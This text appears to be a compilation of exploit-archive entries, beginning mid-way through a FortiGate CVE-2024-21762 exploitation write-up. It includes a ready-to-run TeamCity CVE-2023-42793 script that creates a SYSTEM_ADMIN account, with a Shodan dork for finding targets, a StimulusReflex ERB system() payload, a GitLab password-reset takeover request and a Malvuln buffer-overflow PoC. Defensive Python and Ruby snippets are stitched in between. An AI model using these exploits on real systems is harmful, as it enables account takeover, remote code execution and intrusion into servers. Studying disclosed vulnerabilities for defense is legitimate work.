/><br />When `*(_BYTE *)(a1+0x20*(N+6)+0x10)&6==0` (0<N<5) is satisfied, `*(__int64 (__fastcall **)(__int64))(*(_QWORD *)(*(_QWORD *)(a1 + 0x298)+0x70)+0xC0)(a1)` is called dynamically. Therefore, the member at `a1 + 0x298` needs to be faked into a multi-level pointer that ultimately points to the function we want to call. Since the target binary does not have PIE enabled, qualifying multi-level pointers can be found in the target binary itself. Analyzing the binary, we find that the first one points to the GOT entry of the corresponding function.<br /><br />![image](https://github.com/h4x0r-dz/CVE-2024-21762/assets/26070859/9d274361-093b-4042-9c67-bd5083c8d888)<br /><br />![image](https://github.com/h4x0r-dz/CVE-2024-21762/assets/26070859/f27436b9-a3d1-4650-85d6-6117b57ad3a3)<br /><br />Taking the `system` function as an example, a qualifying multi-level pointer can be found:<br /><br />![image](https://github.com/h4x0r-dz/CVE-2024-21762/assets/26070859/3ca3f7d6-b416-4cf8-9c41-6f6eb1e79b0e)<br /><br />During heap spraying, setting the value at offset 0x298 of the structure to `0x4368d0` can be used to call the `system` function. The effect is as follows:<br /><br /><br />![image](https://github.com/h4x0r-dz/CVE-2024-21762/assets/26070859/c19cfc84-c3c3-43a5-909b-5d5eee935815)<br /><br />As shown in the figure, the argument of the dynamic call is exactly `a1`, and the memory it points to is controllable. At this point, the `system` function could normally be used to execute arbitrary commands. However, on FortiGate the `/bin/sh` file is not capable of executing commands, so executing commands through `system` does not succeed.<br /><br /><br />Hijack RIP<br />============<br /><br />Since the `system` function cannot execute commands, another way to complete RCE has to be found. The existing condition is that any function in the GOT table can be called, and the memory pointed to by its first argument is controllable. Therefore, if there is a function in the GOT table that calls back through some member of its argument, there is a chance to achieve RIP hijacking. An obvious candidate is `SSL_do_handshake`, which was often used in previous FortiGate exploits.<br /><br />![image](https://github.com/h4x0r-dz/CVE-2024-21762/assets/26070859/bc6aaf2a-9c58-4ade-9af0-ccadcc79274b)<br /><br />It is only necessary to construct the SSL structure so that the conditions are met and the final call `s->handshake_func(s)` is reached, which hijacks rip; the figure shows rip hijacked to 0xdeadbeef:<br /><br />![image](https://github.com/h4x0r-dz/CVE-2024-21762/assets/26070859/b3979820-893f-47e3-bd94-b63fa58a7bb7)<br /><br /><br />The FortiGate main program is an all-in-one binary of over 70MB, so there are a large number of usable gadgets. Implementing RCE with ROP is not difficult and is not detailed here.<br /><br /><br />### demo :<br /><br />Although web mode is turned off by default in SSL VPN version 7.4.2 and browser access returns 403, this vulnerability can still be exploited in the default configuration.<br /><br />![ezgif-6-c1d88c0511](https://github.com/h4x0r-dz/CVE-2024-21762/assets/26070859/0e8188fa-de85-4579-b932-924c0e54b334)<br /><br /><br /><br />This vulnerability is similar to last year's heap overflow vulnerability CVE-2023-27997, which was caused by XOR. Both are seemingly useless overflows whose exploitation is tricky and more like a CTF challenge. However, compared with traditional CTF problems that attack heap managers, real vulnerabilities require more context about structures and code logic to be exploited. The author's level is limited; if there are any mistakes, please correct me.<br /><br /><br />Original post in Chinese: https://mp.weixin.qq.com/s?__biz=Mzk0OTU2ODQ4Mw==&mid=2247484811&idx=1&sn=2e0407a32ba0c2925d6d857f4cdf7cbb&chksm=c3571307f4209a110d6b28cea9fe59ac0f0a2079c998a682e919860f397ea647fa0794933906&mpshare=1&scene=1&srcid=0313EaETjGzEAvOdByUt6ovU#rd<br /><br /><br /></code></pre>
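The check the patch adds, shown from the defender's side as an added example (not Fortinet's code): a chunked-body decoder that refuses any chunk-size line longer than 16 bytes, so a long run of leading zeros is rejected before its length can drive an offset; the 16-byte bound is the one the diff above describes, everything else (function names, error type) is assumed.

```python
from typing import List, Tuple

# Upper bound the patch enforces on the chunk-size line (ap_getline result > 16 is rejected).
MAX_CHUNK_SIZE_LINE = 16


class ChunkedBodyError(ValueError):
    """Malformed chunked encoding; the request should be answered with 400."""


def parse_chunk_size_line(line: bytes) -> int:
    """Parse one chunk-size line: hex digits plus optional ';' chunk extensions.

    A line longer than 16 bytes (for example a long run of leading zeros) is
    refused before its length can influence any buffer offset.
    """
    if len(line) > MAX_CHUNK_SIZE_LINE:
        raise ChunkedBodyError("chunk-size line too long: %d bytes" % len(line))
    size_field = line.split(b";", 1)[0].strip()
    if not size_field or any(c not in b"0123456789abcdefABCDEF" for c in size_field):
        raise ChunkedBodyError("invalid chunk size %r" % size_field)
    return int(size_field, 16)


def decode_chunked(body: bytes) -> Tuple[bytes, List[bytes]]:
    """Decode a chunked message body into (payload, trailer header lines)."""
    payload = bytearray()
    pos = 0
    while True:
        end = body.find(b"\r\n", pos)
        if end < 0:
            raise ChunkedBodyError("missing CRLF after chunk size")
        size = parse_chunk_size_line(body[pos:end])
        pos = end + 2
        if size == 0:
            break  # last-chunk: the trailer section follows
        if body[pos + size:pos + size + 2] != b"\r\n":
            raise ChunkedBodyError("chunk data truncated or not CRLF-terminated")
        payload += body[pos:pos + size]
        pos += size + 2
    trailers = []
    while True:
        end = body.find(b"\r\n", pos)
        if end < 0:
            raise ChunkedBodyError("unterminated trailer section")
        line = body[pos:end]
        pos = end + 2
        if not line:
            return bytes(payload), trailers
        trailers.append(bytes(line))


def is_rejected(body: bytes) -> bool:
    """True if the decoder refuses the body (helper for checks and tests)."""
    try:
        decode_chunked(body)
    except ChunkedBodyError:
        return True
    return False


if __name__ == "__main__":
    print(decode_chunked(b"4\r\nWiki\r\n5\r\npedia\r\n0\r\nX-Trailer: 1\r\n\r\n"))
    print("overlong zero chunk size rejected:", is_rejected(b"0" * 40 + b"\r\n\r\n"))
```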
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024<br />Original source: https://malvuln.com/advisory/19a14d0414aec62ef38378de2e8b259d.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Emegrab.b<br />Vulnerability: Remote Stack Buffer Overflow (SEH)<br />Family: Emegrab<br />Type: PE32<br />MD5: 19a14d0414aec62ef38378de2e8b259d<br />Vuln ID: MVID-2024-0675<br />ASLR: False<br />DEP: False<br />CFG: False<br />Safe SEH: False<br />Disclosure: 03/13/2024<br />Description: The malware listens on TCP port 2323 (typically); however, I have seen it use 4823. On subsequent restarts it has used 3012, 3182, 4735, 4578, 4133, 5347, 4978, then eventually reuses port 2323. Third-party adversaries who can reach the server can send a specially crafted payload triggering a stack buffer overflow, overwriting the ECX and EIP registers and the Structured Exception Handler (SEH).<br /><br /><br />Memory Dump:<br />(14c0.b6c): Access violation - code c0000005 (first/second chance not available)<br />eax=00000000 ebx=00000000 ecx=41414141 edx=775e9d70 esi=00000000 edi=00000000<br />eip=41414141 esp=260013e8 ebp=26001408 iopl=0 nv up ei pl zr na pe nc<br />cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246<br />41414141 ?? ???<br /><br />0:009> .ecxr<br />eax=00000000 ebx=00000000 ecx=41414141 edx=775e9d70 esi=00000000 edi=00000000<br />eip=41414141 esp=260013e8 ebp=26001408 iopl=0 nv up ei pl zr na pe nc<br />cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246<br />41414141 ?? ???<br /><br />0:009> !analyze -v<br />*******************************************************************************<br />* *<br />* Exception Analysis *<br />* *<br />*******************************************************************************<br /><br />*** WARNING: Unable to verify checksum for Backdoor.Win32.Emegrab.b.19a14d0414aec62ef38378de2e8b259d.e<br />*** ERROR: Symbol file could not be found. 
Defaulted to export symbols for Backdoor.Win32.Emegrab.b.19a14d0414aec62ef38378de2e8b259d.e - <br /><br />FAULTING_IP: <br />Backdoor_Win32_Emegrab_b_19a14d0414aec62ef38378de2e8b259d+fa2b<br />0040fa2b 888434a0000000 mov byte ptr [esp+esi+0A0h],al<br /><br />EXCEPTION_RECORD: 260f5de8 -- (.exr 0x260f5de8)<br />ExceptionAddress: 0040fa2b (Backdoor_Win32_Emegrab_b_19a14d0414aec62ef38378de2e8b259d+0x0000fa2b)<br /> ExceptionCode: c0000005 (Access violation)<br /> ExceptionFlags: 00000000<br />NumberParameters: 2<br /> Parameter[0]: 00000001<br /> Parameter[1]: 26100000<br />Attempt to write to address 26100000<br /><br />PROCESS_NAME: Backdoor.Win32.Emegrab.b.19a14d0414aec62ef38378de2e8b259d.e<br /><br />ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.<br /><br />EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.<br /><br />EXCEPTION_PARAMETER1: 00000008<br /><br />EXCEPTION_PARAMETER2: 41414141<br /><br />WRITE_ADDRESS: 41414141 <br /><br />FOLLOWUP_IP: <br />Backdoor_Win32_Emegrab_b_19a14d0414aec62ef38378de2e8b259d+fa2b<br />0040fa2b 888434a0000000 mov byte ptr [esp+esi+0A0h],al<br /><br />FAILED_INSTRUCTION_ADDRESS: <br />+fa2b<br />41414141 ?? 
???<br /><br />NTGLOBALFLAG: 0<br /><br />APPLICATION_VERIFIER_FLAGS: 0<br /><br />IP_ON_HEAP: 41414141<br /><br />IP_IN_FREE_BLOCK: 41414141<br /><br />CONTEXT: 260f5e38 -- (.cxr 0x260f5e38)<br />eax=00000041 ebx=00000000 ecx=0be58a88 edx=260f61e0 esi=00009cc8 edi=00433f74<br />eip=0040fa2b esp=260f6298 ebp=260fff80 iopl=0 nv up ei pl zr na pe nc<br />cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246<br />Backdoor_Win32_Emegrab_b_19a14d0414aec62ef38378de2e8b259d+0xfa2b:<br />0040fa2b 888434a0000000 mov byte ptr [esp+esi+0A0h],al ss:002b:26100000=??<br />Resetting default scope<br /><br />FAULTING_THREAD: ffffffff<br /><br />BUGCHECK_STR: APPLICATION_FAULT_STACK_OVERFLOW_SOFTWARE_NX_FAULT_INVALID_EXPLOITABLE_FILL_PATTERN_41414141<br /><br />PRIMARY_PROBLEM_CLASS: STACK_OVERFLOW_INVALID_EXPLOITABLE_FILL_PATTERN_41414141<br /><br />DEFAULT_BUCKET_ID: STACK_OVERFLOW_INVALID_EXPLOITABLE_FILL_PATTERN_41414141<br /><br />LAST_CONTROL_TRANSFER: from 41414141 to 0040fa2b<br /><br />FRAME_ONE_INVALID: 1<br /><br />STACK_TEXT: <br />260f6298 0040fa2b backdoor_win32_emegrab_b+0xfa2b<br />260fff88 41414141 unknown!printable+0x0<br />260fff8c 41414141 unknown!printable+0x0<br />260fff90 41414141 unknown!printable+0x0<br />260fff94 41414141 unknown!printable+0x0<br />260fff98 41414141 unknown!printable+0x0<br />260fff9c 41414141 unknown!printable+0x0<br />260fffa0 41414141 unknown!printable+0x0<br />260fffa4 41414141 unknown!printable+0x0<br />260fffa8 41414141 unknown!printable+0x0<br />260fffac 41414141 unknown!printable+0x0<br />260fffb0 41414141 unknown!printable+0x0<br />260fffb4 41414141 unknown!printable+0x0<br />260fffb8 41414141 unknown!printable+0x0<br />260fffbc 41414141 unknown!printable+0x0<br />260fffc0 41414141 unknown!printable+0x0<br />260fffc4 41414141 unknown!printable+0x0<br />260fffc8 41414141 unknown!printable+0x0<br />260fffcc 41414141 unknown!printable+0x0<br />260fffd0 41414141 unknown!printable+0x0<br />260fffd4 41414141 
unknown!printable+0x0<br />260fffd8 41414141 unknown!printable+0x0<br />260fffdc 41414141 unknown!printable+0x0<br />260fffe0 41414141 unknown!printable+0x0<br />260fffe4 41414141 unknown!printable+0x0<br />260fffe8 41414141 unknown!printable+0x0<br />260fffec 41414141 unknown!printable+0x0<br />260ffff0 41414141 unknown!printable+0x0<br />260ffff4 41414141 unknown!printable+0x0<br />260ffff8 41414141 unknown!printable+0x0<br />260ffffc 41414141 unknown!printable+0x0<br />26100000 41414141 unknown!printable+0x0<br /><br />STACK_COMMAND: .cxr 00000000260F5E38 ; kb ; dds 260f6298 ; kb<br /><br />SYMBOL_STACK_INDEX: 0<br /><br />SYMBOL_NAME: backdoor_win32_emegrab_b+fa2b<br /><br />FOLLOWUP_NAME: MachineOwner<br /><br />MODULE_NAME: Backdoor_Win32_Emegrab_b_19a14d0414aec62ef38378de2e8b259d<br /><br />IMAGE_NAME: Backdoor.Win32.Emegrab.b.19a14d0414aec62ef38378de2e8b259d.e<br /><br />DEBUG_FLR_IMAGE_TIMESTAMP: 4a822c0e<br /><br />FAILURE_BUCKET_ID: STACK_OVERFLOW_INVALID_EXPLOITABLE_FILL_PATTERN_41414141_c0000005_Backdoor.Win32.Emegrab.b.19a14d0414aec62ef38378de2e8b259d.e!Unknown<br /><br />BUCKET_ID: APPLICATION_FAULT_STACK_OVERFLOW_SOFTWARE_NX_FAULT_INVALID_EXPLOITABLE_FILL_PATTERN_41414141_BAD_IP_backdoor_win32_emegrab_b+fa2b<br />0:009> !exchain<br />260013fc: ntdll!ExecuteHandler2+44 (775e9d70)<br />260fffcc: 41414141<br />Invalid exception stack at 41414141<br /><br /><br />Exploit/PoC:<br />from socket import *<br /><br />MALWARE_HOST="x.x.x.x"<br />PORT=2323<br />s=socket(AF_INET, SOCK_STREAM)<br />s.connect((MALWARE_HOST, PORT))<br /><br />PAYLOAD="A"*666<br />s.send(PAYLOAD.encode())<br />s.close()<br /><br />print("Backdoor.Win32.Emegrab BOF Exploit by Malvuln")<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. 
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>StimulusReflex CVE-2024-28121<br /><br />Arbitrary code execution in StimulusReflex. This affects version 3.5.0 up to and including 3.5.0.rc2 and v3.5.0.pre10.<br /><br />## Vulnerable code excerpt<br /><br />stimulus_reflex/lib/stimulus_reflex/reflex.rb<br />```ruby<br />  # Invoke the reflex action specified by `name` and run all callbacks<br />  def process(name, *args)<br />    run_callbacks(:process) { public_send(name, *args) }<br />  end<br />```<br /><br />stimulus_reflex/app/channels/stimulus_reflex/channel.rb<br />```ruby<br />  def delegate_call_to_reflex(reflex)<br />    method_name = reflex.method_name<br />    arguments = reflex.data.arguments<br />    method = reflex.method(method_name)<br /><br />    policy = StimulusReflex::ReflexMethodInvocationPolicy.new(method, arguments)<br /><br />    if policy.no_arguments?<br />      reflex.process(method_name)<br />    elsif policy.arguments?<br />      reflex.process(method_name, *arguments)<br />    else<br />      raise ArgumentError.new("wrong number of arguments (given #{arguments.inspect}, expected #{policy.required_params.inspect}, optional #{policy.optional_params.inspect})")<br />    end<br />  end<br />```<br /><br />stimulus_reflex/lib/stimulus_reflex/policies/reflex_invocation_policy.rb<br />```ruby<br />module StimulusReflex<br />  class ReflexMethodInvocationPolicy<br />    attr_reader :arguments, :required_params, :optional_params<br /><br />    def initialize(method, arguments)<br />      @arguments = arguments<br />      @required_params = method.parameters.select { |(kind, _)| kind == :req }<br />      @optional_params = method.parameters.select { |(kind, _)| kind == :opt }<br />    end<br /><br />    def no_arguments?<br />      arguments.size == 0 && required_params.size == 0<br />    end<br /><br />    def arguments?<br />      arguments.size >= required_params.size && arguments.size <= required_params.size + optional_params.size<br />    end<br /><br />    def unknown?<br />      return false if no_arguments?<br />      return false if arguments?<br /><br />      true<br />    end<br />  end<br />end<br />```<br /><br />The method name and arguments come from the client's websocket message, and the policy only checks the argument count, so `public_send` reaches any public method on the reflex, including methods inherited from `StimulusReflex::Reflex` such as `render_collection`.<br /><br />## Payload<br /><br />Find a websocket message with target and args.<br />```<br />\"target\":\"StimulusReflex::Reflex#render_collection\",\"args\":[{\"inline\": \"<% system('[command here]') %>\"}]<br />```<br /></code></pre>
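An added example, not StimulusReflex's own code or its patch: a minimal stand-in for the dispatch path excerpted above, together with a hardened dispatcher that only lets a client-supplied method name reach actions declared on the application's own reflex class, so inherited framework helpers such as `render_collection` are no longer callable. `BaseReflex`, `CounterReflex`, `ReflexDispatchError` and `safe_dispatch` are constructed names for this example.

```ruby
require "erb"

# Constructed stand-in for the framework base class. Its render_collection
# just evaluates an inline ERB template, which is enough to show why reaching
# it with client-chosen arguments amounts to running arbitrary Ruby.
class BaseReflex
  def render_collection(options = {})
    ERB.new(options[:inline].to_s).result(binding)
  end

  # Same shape as the vulnerable dispatch: any public method is callable.
  def process(name, *args)
    public_send(name, *args)
  end
end

# An application reflex: only these actions are meant to be client-callable.
class CounterReflex < BaseReflex
  attr_reader :count

  def initialize
    @count = 0
  end

  def increment(step = 1)
    @count += step
  end
end

class ReflexDispatchError < StandardError; end

# Hardened dispatch: the name must be an action declared on the concrete reflex
# class itself (public_instance_methods(false) excludes inherited methods), and
# the argument count must fit the method's required/optional parameters, which
# was the only check the original policy performed.
def safe_dispatch(reflex, method_name, args)
  name = method_name.to_s.to_sym
  own_actions = reflex.class.public_instance_methods(false)
  raise ReflexDispatchError, "#{name} is not a reflex action" unless own_actions.include?(name)

  params = reflex.method(name).parameters
  required = params.count { |kind, _| kind == :req }
  optional = params.count { |kind, _| kind == :opt }
  unless args.size.between?(required, required + optional)
    raise ReflexDispatchError, "wrong number of arguments for #{name}"
  end
  reflex.process(name, *args)
end
```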
<pre><code># Exploit Title: GitLab CE/EE < 16.7.2 - Password Reset<br /># Exploit Author: Sebastian Kriesten (0xB455)<br /># Twitter: https://twitter.com/0xB455<br /><br /># Date: 2024-01-12<br /># Vendor Homepage: gitlab.com<br /># Vulnerability disclosure: https://about.gitlab.com/releases/2024/01/11/critical-security-release-gitlab-16-7-2-released/<br /># Version: <16.7.2, <16.6.4, <16.5.6<br /># CVE: CVE-2023-7028<br /><br />Proof of Concept:<br />user[email][]=valid@email.com&user[email][]=attacker@email.com<br /><br /><br /></code></pre>
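An added example, not GitLab's code: Rails (through Rack) parses `user[email][]=a&user[email][]=b` into an array under `params[:user][:email]`, which is what the PoC above relies on. The block reproduces that parsing with a constructed simplified parser (`parse_nested_query`, standing in for `Rack::Utils.parse_nested_query`) and shows the check a password-reset handler needs before any lookup or mail delivery: accept the email only when it is exactly one string. `assign`, `reset_target` and `EMAIL` are names constructed for this example.

```ruby
require "cgi"

# Constructed simplification of Rack's nested query parsing: "a[b][]=v" builds
# {"a" => {"b" => ["v"]}}, and a repeated "a[b][]" key appends to the array.
def parse_nested_query(body)
  params = {}
  body.split("&").each do |pair|
    raw_key, raw_val = pair.split("=", 2)
    key = CGI.unescape(raw_key.to_s)
    head = key[/\A[^\[]+/]
    parts = [head, *key.scan(/\[([^\]]*)\]/).flatten]
    assign(params, parts, CGI.unescape(raw_val.to_s))
  end
  params
end

# Walk the bracket path; an empty segment ("[]") means "append to an array".
def assign(node, parts, val)
  part = parts.first
  if parts.size == 1
    if part == ""
      node << val
    else
      node[part] = val
    end
    return
  end
  node[part] ||= (parts[1] == "" ? [] : {})
  assign(node[part], parts.drop(1), val)
end

EMAIL = /\A[^@\s]+@[^@\s]+\.[^@\s]+\z/

# Defender-side check for a reset handler: the email must be a single String,
# never an Array, so a second attacker-controlled address can't ride along.
# Returns [email, nil] on success or [nil, reason] on rejection.
def reset_target(params)
  email = params.dig("user", "email")
  return [nil, "email must be a single address, got #{email.class}"] unless email.is_a?(String)
  return [nil, "malformed email"] unless email.match?(EMAIL)
  [email, nil]
end
```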
<pre><code>#- Exploit Title: JetBrains TeamCity 2023.05.3 - Remote Code Execution (RCE)<br />#- Shodan Dork: http.title:TeamCity , http.favicon.hash:-1944119648<br />#- Exploit Author: ByteHunter<br />#- Vendor: JetBrains<br />#- Email: 0xByteHunter@proton.me<br />#- Version: versions before 2023.05.4<br />#- Tested on: 2023.05.3<br />#- CVE : CVE-2023-42793<br /><br />import requests<br />import argparse<br />import re<br />import random<br />import string<br />import subprocess<br /><br /><br />banner = """<br />=====================================================<br />* CVE-2023-42793 *<br />* TeamCity Admin Account Creation *<br />* *<br />* Author: ByteHunter *<br />=====================================================<br />"""<br /><br />print(banner)<br />parser = argparse.ArgumentParser(description="CVE-2023-42793 - TeamCity JetBrains PoC")<br />parser.add_argument("-u", "--url", required=True, help="Target URL")<br />parser.add_argument("-v", "--verbose", action="store_true", help="verbose mode")<br />args = parser.parse_args()<br /><br />url = args.url<br /><br /># The printed curl equivalent skips certificate verification for HTTPS targets<br />if url.startswith("https://"):<br />    curl_command = "curl -k"<br />else:<br />    curl_command = "curl"<br /><br />get_token_url = f"{url}/app/rest/users/id:1/tokens/RPC2"<br />delete_token_url = f"{url}/app/rest/users/id:1/tokens/RPC2"<br />create_user_url = f"{url}/app/rest/users"<br /><br />create_user_command = ""<br />token = ""<br /><br /># Step 1: ask the server for an access token named RPC2 for user id:1, without authenticating<br />response = requests.post(get_token_url, verify=False)<br />if response.status_code == 200:<br />    match = re.search(r'value="([^"]+)"', response.text)<br />    if match:<br />        token = match.group(1)<br />        print(f"Token: {token}")<br />    else:<br />        print("Token not found in the response")<br /><br /># 404 and 400 are both treated as "a token named RPC2 already exists": delete it and rerun<br />elif response.status_code in (404, 400):<br />    print("Token already exists")<br />    delete_command = f'{curl_command} -X DELETE {delete_token_url}'<br />    delete_process = subprocess.Popen(delete_command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)<br />    delete_process.wait()<br />    delete_output = delete_process.communicate()<br />    if delete_process.returncode == 0:<br />        print("Previous token deleted successfully\nrun this command again for creating new token & admin user.")<br />    else:<br />        print("Failed to delete the previous token")<br />else:<br />    print("Failed to get a token")<br /><br /># Step 2: use the token as a Bearer credential to create a SYSTEM_ADMIN user via the REST API<br />if token:<br />    headers = {<br />        "Authorization": f"Bearer {token}",<br />        "Content-Type": "application/json"<br />    }<br />    random_chars = ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(4))<br />    username = f"city_admin{random_chars}"<br />    data = {<br />        "username": username,<br />        "password": "Main_password!!**",<br />        "email": "angry-admin@funnybunny.org",<br />        "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}<br />    }<br />    # curl equivalent shown in verbose mode; note its password and email differ from `data` above<br />    create_user_command = f'{curl_command} --path-as-is -H "Authorization: Bearer {token}" -X POST {create_user_url} -H "Content-Type: application/json" --data \'{{"username": "{username}", "password": "theSecretPass!", "email": "nest@nest", "roles": {{"role": [{{"roleId": "SYSTEM_ADMIN", "scope": "g"}}]}}}}\''<br />    create_user_response = requests.post(create_user_url, headers=headers, json=data)<br />    if create_user_response.status_code == 200:<br />        print("Successfully exploited!")<br />        print(f"URL: {url}")<br />        print(f"Username: {username}")<br />        print("Password: Main_password!!**")<br />    else:<br />        print("Failed to create new admin user")<br /><br />if args.verbose:<br />    if response.status_code == 400:<br />        pass<br />    else:<br />        print(f"Final curl command: {create_user_command}")<br /></code></pre>